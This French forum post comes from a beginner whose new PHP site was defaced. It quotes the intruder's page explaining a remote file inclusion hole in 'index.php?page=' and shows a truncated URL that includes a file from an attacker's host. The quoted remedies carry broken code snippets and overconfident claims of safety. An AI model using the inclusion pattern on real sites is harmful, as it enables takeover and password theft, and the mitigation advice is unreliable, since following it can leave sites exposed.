Aller au contenu

hack de site en php


zigomat

Messages recommandés

Salut !

Je viens de faire mon premier site en php...Et à peine en ligne...déjà hacké !!!

Vu que je suis novice en php...Mon(ma) pirate m'a juste ajouté une page complètement dingue m'expliquant comment éviter de me faire à nouveau hacker ... :non:

Voici son contenu...Si quelqu'un peut m'en dire si ce qui suit est juste ou faux...Merci !

Site piraté !

Pourquoi cet acte ? Certainement pas dans le but de nuire, bien que certains pourront le prendre comme tel, cette intrusion est bien moins méchante qu'elle peut y paraitre : Rien n'a été supprimé sur le FTP, elle sert à montrer du doigt une faille exploitable par les pirates, leur permettant de prendre le contrôle d'un site.

Comment ? Votre site fait appel à une page via PHP, dans votre cas, le pirate peut inclure la page de son choix, et ainsi supprimer des fichiers, en rajouter, éditer le site, voir les mots de passe, ou afficher sa page, comme je l'ai fais.

Comment y remedier ? Vous disposez de plusieurs solutions : Au lieu de devoir faire un lien comme suit : http://www.votresite/index.php?page=Staff.php, appellez le lien en enlevant l'extension PHP, dans votre code, cela ressemblera à : <?php include(".php") ?>

bien que cela constitue un moyen simple de remedier aux attaques les plus violentes (destruction du site), la personne pourra continuer à inclure ses pages PHP sur votre site, mais aucun script ne pourra y etre éxecuté, il ne pourra qu'afficher de l'html, voici le moyen : http://www.votresite.php/index.php?page=ht...ker.com/fichier.

Une troisieme solution consiste à inclure vos fichiers PHP, mais les appeller dans un autre dossier (/includes/link.php) votre code PHP ressemblera dans ce cas à : <?php include(includes/.php) ?> Dans ce cas, le pirateur ne pourra rien tenter contre votre site.

Amicalement, j'espere que mes conseils vous serviront,

Une lootrophile anonyme.